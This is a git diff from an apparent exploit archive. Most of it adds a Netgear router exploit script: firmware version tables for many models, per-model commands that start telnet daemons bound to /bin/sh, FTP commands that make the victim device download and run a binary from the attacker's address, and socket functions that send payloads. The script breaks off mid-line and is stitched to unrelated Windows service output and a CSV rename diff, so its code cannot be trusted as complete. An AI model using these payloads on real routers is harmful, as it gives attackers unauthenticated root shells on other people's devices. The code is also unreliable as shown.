"V1.0.2.66_60.0.90NA" : "1.0.2.66NA", + "V1.0.2.60_60.0.85" : "1.0.2.60", + "V1.0.2.60_60.0.85NA" : "1.0.2.60NA", + "V1.0.2.58_60.0.84NA" : "1.0.2.58NA", + "V1.0.2.54_60.0.82" : "1.0.2.54", + "V1.0.2.54_60.0.82NA" : "1.0.2.54NA", + "V1.0.2.26_51.0.59" : "1.0.2.26", + "V1.0.2.26_51.0.59NA" : "1.0.2.26NA", + "V1.0.2.18_47.0.52" : "1.0.2.18", + "V1.0.2.18_47.0.52NA" : "1.0.2.18NA", + }, + "WGT624V4" : { + "V2.0.13_2.0.15NA" : "2.0.13.2", + "V2.0.13_2.0.14" : "2.0.13", + "V2.0.13_2.0.14NA" : "2.0.13NA", + "V2.0.12_2.0.12" : "2.0.12", + "V2.0.12_2.0.12NA" : "2.0.12NA", + "V2.0.6_2.0.6NA" : "2.0.6NA", + }, + "WN2500RP" : { + "V1.0.0.30_1.0.58" : "1.0.0.30", + "V1.0.0.26_1.0.54" : "1.0.0.26", + "V1.0.0.24_1.0.53" : "1.0.0.24", + }, + "WN2500RPV2" : { + "V1.0.1.54_1.0.68" : "1.0.1.54", + "V1.0.1.50_1.0.64" : "1.0.1.50", + "V1.0.1.46_1.0.60" : "1.0.1.46", + "V1.0.1.42_1.0.56" : "1.0.1.42", + "V1.0.0.30_1.0.41" : "1.0.0.30", + }, + "WN3000RP" : { + "V1.0.2.64_1.1.86" : "1.0.2.64", + "V1.0.1.36_1.1.47" : "1.0.1.36", + "V1.0.1.34_1.1.46" : "1.0.1.34", + "V1.0.1.18_1.1.24" : "1.0.1.18", + "V1.0.0.12_1.0.12" : "1.0.0.12", + }, + "WN3100RP" : { + "V1.0.0.20_1.0.22" : "1.0.0.20", + "V1.0.0.16_1.0.20" : "1.0.0.16", + "V1.0.0.14_1.0.19" : "1.0.0.14", + "V1.0.0.6_1.0.12" : "1.0.0.6", + }, + "WN3500RP" : { + "V1.0.0.22_1.0.62" : "1.0.0.22", + "V1.0.0.20_1.0.60" : "1.0.0.20", + "V1.0.0.18_1.0.59" : "1.0.0.18", + "V1.0.0.16_1.0.58" : "1.0.0.16", + "V1.0.0.14_1.0.54" : "1.0.0.14", + "V1.0.0.12_1.0.49" : "1.0.0.12", + }, + "WNCE3001" : { + "V1.0.0.50_1.0.35" : "1.0.0.50", + "V1.0.0.46_1.0.33" : "1.0.0.46", + "V1.0.0.44_1.0.32" : "1.0.0.44", + "V1.0.0.38" : "1.0.0.38", + }, + "WNDR3300" : { + "V1.0.45_1.0.45" : "1.0.45", + "V1.0.45_1.0.45NA" : "1.0.45NA", + "V1.0.29_1.0.29" : "1.0.29", + "V1.0.29_1.0.29NA" : "1.0.29NA", + "V1.0.27_1.0.27NA" : "1.0.27NA", + "V1.0.26_1.0.26" : "1.0.26", + "V1.0.26_1.0.26NA" : "1.0.26NA", + "V1.0.23_1.0.23NA" : "1.0.23NA", + "Version Detection Fail" : "1.0.14", + "Version Detection Fail" : "1.0.14NA", + }, + "WNDR3300V2" : { + "V1.0.0.26_11.0.26NA" : "1.0.0.26", + }, + "WNDR3400" : { + "V1.0.0.52_20.0.60" : "1.0.0.52", + "V1.0.0.50_20.0.59" : "1.0.0.50", + "V1.0.0.38_16.0.48" : "1.0.0.38", + "V1.0.0.34_15.0.42" : "1.0.0.34", + }, + "WNDR3400V2" : { + "V1.0.0.54_1.0.82" : "1.0.0.54", + "V1.0.0.52_1.0.81" : "1.0.0.52", + "V1.0.0.38_1.0.61" : "1.0.0.38", + "V1.0.0.34_1.0.52" : "1.0.0.34", + "V1.0.0.16_1.0.34" : "1.0.0.16", + "V1.0.0.12_1.0.30" : "1.0.0.12", + }, + "WNDR3400V3" : { + "V1.0.1.24_1.0.67" : "1.0.1.24", + "V1.0.1.22_1.0.66" : "1.0.1.22", + "V1.0.1.18_1.0.63" : "1.0.1.18", + "V1.0.1.16_1.0.62" : "1.0.1.16", + "V1.0.1.14_1.0.61" : "1.0.1.14", + "V1.0.1.12_1.0.58" : "1.0.1.12", + "V1.0.1.8_1.0.56" : "1.0.1.8", + "V1.0.1.4_1.0.52" : "1.0.1.4", + "V1.0.1.2_1.0.51" : "1.0.1.2", + "V1.0.0.48_1.0.48" : "1.0.0.48", + "V1.0.0.46_1.0.45" : "1.0.0.46", + "V1.0.0.38_1.0.40" : "1.0.0.38", + "V1.0.0.22_1.0.29" : "1.0.0.22", + "V1.0.0.20_1.0.28" : "1.0.0.20", + }, + "WNDR3700V3" : { + "V1.0.0.42_1.0.33" : "1.0.0.42", + "V1.0.0.38_1.0.31" : "1.0.0.38", + "V1.0.0.36_1.0.30" : "1.0.0.36", + "V1.0.0.30_1.0.27" : "1.0.0.30", + "V1.0.0.22_1.0.17" : "1.0.0.22", + "V1.0.0.18_1.0.14" : "1.0.0.18", + }, + "WNDR4000" : { + "V1.0.2.10_9.1.89" : "1.0.2.10", + "V1.0.2.6_9.1.87" : "1.0.2.6", + "V1.0.2.4_9.1.86" : "1.0.2.4", + "V1.0.2.2_9.1.84" : "1.0.2.2", + "V1.0.0.94_9.1.81" : "1.0.0.94", + "V1.0.0.90_9.1.79" : "1.0.0.90", + "V1.0.0.88_9.1.77" : "1.0.0.88", + "V1.0.0.82_8.0.71" : "1.0.0.82", + "V1.0.0.66_8.0.55" : "1.0.0.66", + }, + "WNDR4500" : { + "V1.0.1.46_1.0.76" : "1.0.1.46", + "V1.0.1.40_1.0.68" : "1.0.1.40", + "V1.0.1.38_1.0.64" : "1.0.1.38", + "V1.0.1.36_1.0.63" : "1.0.1.36", + "V1.0.1.20_1.0.40" : "1.0.1.20", + "V1.0.1.18_1.0.36" : "1.0.1.18", + "V1.0.1.6_1.0.24" : "1.0.1.6", + "V1.0.0.58_1.0.13" : "1.0.0.58", + "V1.0.0.50_1.0.12" : "1.0.0.50", + "V1.0.0.40_1.0.10" : "1.0.0.40", + }, + "WNDR4500V2" : { + "V1.0.0.72_1.0.45" : "1.0.0.72", + "V1.0.0.68_1.0.42" : "1.0.0.68", + "V1.0.0.64_1.0.40" : "1.0.0.64", + "V1.0.0.62_1.0.39" : "1.0.0.62", + "V1.0.0.60_1.0.38" : "1.0.0.60", + "V1.0.0.56_1.0.36" : "1.0.0.56", + "V1.0.0.54_1.0.33" : "1.0.0.54", + "V1.0.0.50_1.0.30" : "1.0.0.50", + "V1.0.0.42_1.0.25" : "1.0.0.42", + "V1.0.0.36_1.0.21" : "1.0.0.36", + "V1.0.0.26_1.0.16" : "1.0.0.26", + }, + "WNR834BV2" : { + "V2.1.13_2.1.13" : "2.1.13", + "V2.1.13_2.1.13NA" : "2.1.13NA", + "V2.0.8_2.0.8" : "2.0.8", + "V2.0.8_2.0.8NA" : "2.0.8NA", + "V1.0.32_1.0.32" : "1.0.32", + "V1.0.32_1.0.32NA" : "1.0.32NA", + }, + "WNR1000V3" : { + "V1.0.2.72_60.0.96" : "1.0.2.72", + "V1.0.2.72_60.0.96NA" : "1.0.2.72NA", + "V1.0.2.68_60.0.93" : "1.0.2.68", + "V1.0.2.68_60.0.93NA" : "1.0.2.68NA", + "V1.0.2.62_60.0.87" : "1.0.2.62", + "V1.0.2.62_60.0.87NA" : "1.0.2.62NA", + "V1.0.2.60_60.0.86WW" : "1.0.2.60", + "V1.0.2.60_60.0.86NA" : "1.0.2.60NA", + "V1.0.2.54_60.0.82" : "1.0.2.54", + "V1.0.2.54_60.0.82NA" : "1.0.2.54NA", + "V1.0.2.28_52.0.60" : "1.0.2.28", + "V1.0.2.28_52.0.60NA" : "1.0.2.28NA", + "V1.0.2.26_51.0.59" : "1.0.2.26", + "V1.0.2.26_51.0.59NA" : "1.0.2.26NA", + "V1.0.2.18_47.0.52" : "1.0.2.18", + "V1.0.2.18_47.0.52NA" : "1.0.2.18NA", + "V1.0.2.4_39.0.39" : "1.0.2.4", + }, + "WNR2000V2" : { + "V1.2.0.8_36.0.60" : "1.2.0.8", + "V1.2.0.8_36.0.60NA" : "1.2.0.8NA", + "V1.2.0.6_36.0.58" : "1.2.0.6", + "V1.2.0.6_36.0.58NA" : "1.2.0.6NA", + "V1.2.0.4_35.0.57" : "1.2.0.4", + "V1.2.0.4_35.0.57NA" : "1.2.0.4NA", + "V1.0.0.40_32.0.54" : "1.0.0.40", + "V1.0.0.40_32.0.54NA" : "1.0.0.40NA", + "V1.0.0.35_29.0.47" : "1.0.0.35", + "V1.0.0.34_29.0.45" : "1.0.0.34", + "V1.0.0.34_29.0.45NA" : "1.0.0.34NA", + }, + "WNR3500" : { + "V1.0.36_8.0.36NA" : "1.0.36NA", + "V1.0.30_8.0.30" : "1.0.30", + "V1.0.29_8.0.29NA" : "1.0.29NA", + "V1.0.22_6.0.22" : "1.0.22", + "V1.0.22_6.0.22NA" : "1.0.22NA", + "V1.0.15_1.0.15NA" : "1.0.15NA", + "V1.0.10_1.0.10NA" : "1.0.10NA", + }, + "WNR3500V2" : { + "V1.2.2.28_25.0.85" : "1.2.2.28", + "V1.2.2.28_25.0.85NA" : "1.2.2.28NA", + "V1.0.2.14_24.0.74" : "1.0.2.14", + "V1.0.2.14_24.0.74NA" : "1.0.2.14NA", + "V1.0.2.10_23.0.70" : "1.0.2.10NA", + "V1.0.2.10_23.0.70NA" : "1.0.2.10", + "V1.0.0.64_11.0.51" : "1.0.0.64", + "V1.0.0.64_11.0.51NA" : "1.0.0.64NA", + }, + "WNR3500L" : { + "V1.2.2.48_35.0.55NA" : "1.2.2.48NA", + "V1.2.2.44_35.0.53" : "1.2.2.44", + "V1.2.2.44_35.0.53NA" : "1.2.2.44NA", + "V1.2.2.40_34.0.48" : "1.2.2.40", + "V1.2.2.40_34.0.48NA" : "1.2.2.40NA", + "V1.2.2.30_34.0.37" : "1.2.2.30", + "V1.2.2.30_34.0.37NA" : "1.2.2.30NA", + "V1.0.2.50_31.1.25" : "1.0.2.50", + "V1.0.2.50_31.1.25NA" : "1.0.2.50NA", + "V1.0.2.26_30.0.98" : "1.0.2.26", + "V1.0.2.26_30.0.98NA" : "1.0.2.26NA", + "V1.0.0.88_13.0.76" : "1.0.0.88", + "V1.0.0.88_13.0.76NA" : "1.0.0.88NA", + "V1.0.0.86_13.0.75" : "1.0.0.86", + "V1.0.0.86_13.0.75NA" : "1.0.0.86NA", + }, + "WNR3500LV2" : { + "V1.2.0.56_50.0.96" : "1.2.0.56", + "V1.2.0.54_50.0.94" : "1.2.0.54", + "V1.2.0.50_50.0.90" : "1.2.0.50", + "V1.2.0.48_40.0.88" : "1.2.0.48", + "V1.2.0.46_40.0.86" : "1.2.0.46", + "V1.2.0.44_40.0.84" : "1.2.0.44", + "V1.2.0.40_40.0.80" : "1.2.0.40", + "V1.2.0.38_40.0.78" : "1.2.0.38", + "V1.2.0.34_40.0.75" : "1.2.0.34", + "V1.2.0.32_40.0.74" : "1.2.0.32", + "V1.2.0.28_40.0.72" : "1.2.0.28", + "V1.2.0.26_40.0.71" : "1.2.0.26", + "V1.2.0.20_40.0.68" : "1.2.0.20", + "V1.2.0.18_40.0.67" : "1.2.0.18", + "V1.2.0.16_40.0.66" : "1.2.0.16", + "V1.0.0.14_37.0.50" : "1.0.0.14", + "V1.0.0.10" : "1.0.0.10", + }, + "XR300" : { + "V1.0.3.38_10.3.30" : "1.0.3.38", + "V1.0.3.34_10.3.27" : "1.0.3.34", + "V1.0.3.26_10.3.22" : "1.0.3.26", + "V1.0.2.24_10.3.21" : "1.0.2.24", + "V1.0.2.18_10.3.15" : "1.0.2.18", + "V1.0.1.4_10.1.4" : "1.0.1.4", + }, +} + +# The default command, spawns a telnet daemon on TCP port 8888 (or 3333, when 8888 is already used) +default_commands = { + # These devices ask for a password if you don't specify the login program with -l + "AC1450" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "D8500" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "DC112A" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "EX6200" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "EX7000" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6200V2" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6250" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6300V2" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6400" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6400V2" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6700" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6700V3" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6900" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6900P" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7000" : "/bin/utelnetd -p3333 -l/bin/sh -d", + "R7000P" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7100LG" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7300" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7850" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7900" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R8000" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R8300" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R8500" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "RS400" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "XR300" : "/bin/utelnetd -p8888 -l/bin/sh -d", + + # These devices don't need to create the terminal devices files first + "WGT624V4" : "telnetd -p8888 -l/bin/sh", + + # These devices need to create the terminal device files first + "D6220" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "D6300" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "D6400" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "D7000V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "DGN2200" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "DGN2200M" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "DGN2200V4" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "DGND3700" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX3700" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX3800" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX3920" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6000" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6120" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6130" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6150" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6920" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "LG2200D" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBM621" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBR624GU" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBR1200" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBR1515" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBR1516" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBRN3000" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MVBR1210C" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "R4500" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "R6200" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "R6300" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WGR614V8" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WGR614V9" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888", + "WGR614V10" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WN2500RP" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WN2500RPV2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WN3100RP" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WN3500RP" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3300" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3300V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3400" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3400V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3400V3" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3700V3" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR4000" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR4500" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR4500V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR1000V3" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR2000V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR3500L" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR3500V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR3500LV2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR834BV2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + + # On some versions of the EX6100, port 8888 is already used, so use 3333 instead + "EX6100" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p3333 -l/bin/sh", + + # Some devices need different commands based on the version + "WN3000RP" : collections.defaultdict(lambda : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + {"1.0.2.64" : "/usr/sbin/utelnetd -p8888 -l/bin/sh -d"}), + + # The WNR3500/WGT624v4 don't have the device files or mknod, we'll have the victim download it + "WNCE3001" : "/usr/sbin/ftpc -f /tmp/mknod -s mknod -d LOCAL_IP_ADDRESS -u anonymous; chmod a+x /tmp/mknod; /tmp/mknod; telnetd -p8888 -l/bin/sh", + "WNR3500" : "/usr/sbin/ftpc -f /tmp/mknod -s mknod -d LOCAL_IP_ADDRESS -u anonymous; chmod a+x /tmp/mknod; /tmp/mknod; telnetd -p8888 -l/bin/sh", +} + +# The default command on these devices needs to download mknod via FTP +ftp_devices = {"WNR3500" : "arm_lsb", "WNCE3001" : "mips_msb"} + +########################################################################### +## Functions ############################################################## +########################################################################### + +def send(ip, port, is_https, payload, keep_open = False): + if is_https: + return send_ssl(ip, port, payload, keep_open) + else: + return send_plain(ip, port, payload, keep_open) + +def send_plain(ip, port, payload, keep_open): + sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + sock.connect((ip, port)) + sock.send(payload) + if keep_open: + return sock + sock.close() + +def send_ssl(ip, port, payload, keep_open): + import ssl + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + wrappedSocket = ssl.wrap_socket(sock) + wrappedSocket.connect((ip, port)) + wrappedSocket.send(payload) + if keep_open: + return wrappedSocket + wrappedSocket.close() + +def p32(address, model): + if model in big_endian_devices: + return struct.pack(">I", address) + return struct.pack("wmic service get name,pathname,startmode,StartName | findstr "10-Strike Bandwidth Monitor" +Svc10StrikeBandMonitor C:\Program Files\10-Strike Bandwidth Monitor\BMsvc.exe Auto LocalSystem +Svc10StrikeBMWD C:\Program Files\10-Strike Bandwidth Monitor\BMWDsvc.exe Auto LocalSystem +Svc10StrikeBMAgent C:\Program Files\10-Strike Bandwidth Monitor Agent\BMAgent.exe Auto LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 486af450a..cc0ec866d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -940,7 +940,7 @@ id,file,description,date,author,type,platform,port 7986,exploits/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",dos,windows, 7990,exploits/windows/dos/7990.py,"UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)",2009-02-04,"Andres Luksenberg",dos,windows, 7995,exploits/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)",2009-02-05,"Praveen Darshanam",dos,windows, -8008,exploits/hardware/dos/8008.txt,"NETGEAR SSL312 Router - Denial of Service",2009-02-09,Rembrandt,dos,hardware, +8008,exploits/hardware/dos/8008.txt,"Netgear SSL312 Router - Denial of Service",2009-02-09,Rembrandt,dos,hardware, 8013,exploits/hardware/dos/8013.txt,"Nokia N95-8 - '.jpg' Remote Crash (PoC)",2009-02-09,"Juan Yacubian",dos,hardware, 8021,exploits/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service",2009-02-09,"Praveen Darshanam",dos,multiple, 8024,exploits/windows/dos/8024.py,"TightVNC - Authentication Failure Integer Overflow (PoC)",2009-02-09,desi,dos,windows, @@ -952,7 +952,7 @@ id,file,description,date,author,type,platform,port 8091,exploits/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - BODY onload Remote Crash",2009-02-23,Skylined,dos,multiple, 8099,exploits/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)",2009-02-23,"Guido Landi",dos,windows, 8102,exploits/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,dos,windows, -8106,exploits/hardware/dos/8106.txt,"NETGEAR WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,dos,hardware, +8106,exploits/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,dos,hardware, 8125,exploits/hardware/dos/8125.py,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",dos,hardware, 8129,exploits/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",dos,windows, 8135,exploits/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)",2009-03-02,Hakxer,dos,windows, @@ -1077,7 +1077,7 @@ id,file,description,date,author,type,platform,port 8955,exploits/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - 'syslog' Denial of Service",2009-06-15,h00die,dos,linux, 8957,exploits/multiple/dos/8957.txt,"Apple Safari / QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",dos,multiple, 8960,exploits/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,dos,linux, -8964,exploits/hardware/dos/8964.txt,"NETGEAR DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",dos,hardware, +8964,exploits/hardware/dos/8964.txt,"Netgear DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",dos,hardware, 8971,exploits/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,dos,windows, 8976,exploits/multiple/dos/8976.pl,"Multiple HTTP Server - 'slowloris.pl' Low Bandwidth Denial of Service",2009-06-17,RSnake,dos,multiple, 